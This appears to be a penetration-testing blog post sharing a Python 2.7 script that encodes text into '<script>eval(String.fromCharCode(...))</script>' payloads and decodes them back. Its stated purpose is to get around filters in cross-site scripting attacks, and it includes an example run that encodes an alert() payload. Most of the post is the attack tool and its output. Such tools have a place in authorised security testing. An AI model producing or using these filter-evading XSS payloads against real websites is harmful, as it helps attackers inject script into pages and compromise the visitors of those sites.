Python Unicode Converter

Python Unicode Converter

This is a quick script I wrote for converting to Unicode and back when using string.fromCharCode() to circumvent filters in Cross Site Scripting attacks.

[shell]Usage: -auh

Simple tool to convert from ASCII to Unicode and back for use with String.fromCharCode().

arguments:
-h, –help Show this help message and exit.

-a ASCII_STRING Enter the ASCII string for conversion contained within ” “. Any ” in the string itself must be escaped with a \ or simply use ‘ instead.

-u UNICODE_CHARS Enter the Unicode values for conversion contained within ” “. Script will take comma separated values as well as just spaced.
[/shell]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/usr/bin/python2.7
 
import argparse
import sys
import re
 
def CharCode(text):
    print "<script>eval(String.fromCharCode(",
    for count, letter in enumerate(text): #setting up a for loop, so we can iterate through the string and get the unicode value for each char. enumerate() gets the count of the character and assigns it to count. We can then use these to add commas after each value.
	    Unicode_values = ord(letter) #ord is the built in function that gets the unicode value for an ascii character
	    sys.stdout.write(str(Unicode_values))
	    if count < len(text) -1: #basically saying here, if we are at any value but the last, add a comma after it.len is an inbuilt function that gets the length of a string'''
                sys.stdout.write(', ')
	    else:   
		 sys.stdout.write('))</script>')
		 sys.stdout.write('\r\n') #adding a new line at the end so it looks tidier in the bash shell
 
def CharDecode(unicode_chars):
    ASCII_chars = ""
    for code in unicode_chars.split(' '): #.split() breaks up a string based on the separator you specify (in this case a space).
        if "," in code: 
                code = code.replace(',', '') #here we remove any commas from input
        ASCII_chars += chr(int(code)) #chr is the built in function that converts from unicode to ascii
    print "ASCII string is:", ASCII_chars
 
if __name__ == "__main__":
 
    parser = argparse.ArgumentParser(description='Simple tool to convert from ASCII to Unicode and back for use with String.fromCharCode().', usage = '-auh') #argparse let's us take input via flags
    parser.add_argument("-a", dest = "ascii_string", action = "store", help = '''Enter the ASCII string for conversion contained within " ". Any " in the string itself must be escaped with a \ or simply use ' instead.''', required = False)
    parser.add_argument("-u", dest = "unicode_chars", action = "store", help = '''Enter the Unicode values for conversion contained within " ". Script will take comma separated values as well as just spaced.''', required = False)
 
    args = parser.parse_args() #this makes args the method of the argparser class, so we can access any usersupplied variables with args.variablename'''
 
    if not (args.ascii_string or args.unicode_chars): #checking to make sure some input is supplied
        parser.error("Input is required! Usage: -a ASCII string, -u Unicode values, -h help.")
    if args.ascii_string: 
        CharCode(args.ascii_string)
    if args.unicode_chars:
        CharDecode(args.unicode_chars)

Example usage:

[shell]# ./charcode.py -a “alert(‘hey’)”
&lt;script&gt;eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 104, 101, 121, 39, 41))&lt;/script&gt;[/shell]

Related Content

PRCON 2011
Announcements

PRCON 2011

Whilst we are ardent supporters of maintaining a healthy balance between work and life and well awar...

Welcome to the Perspective Risk Blog
Announcements

Welcome to the Perspective Risk Blog

The Perspective Risk blog has been created to provide information security resources to the penetrat...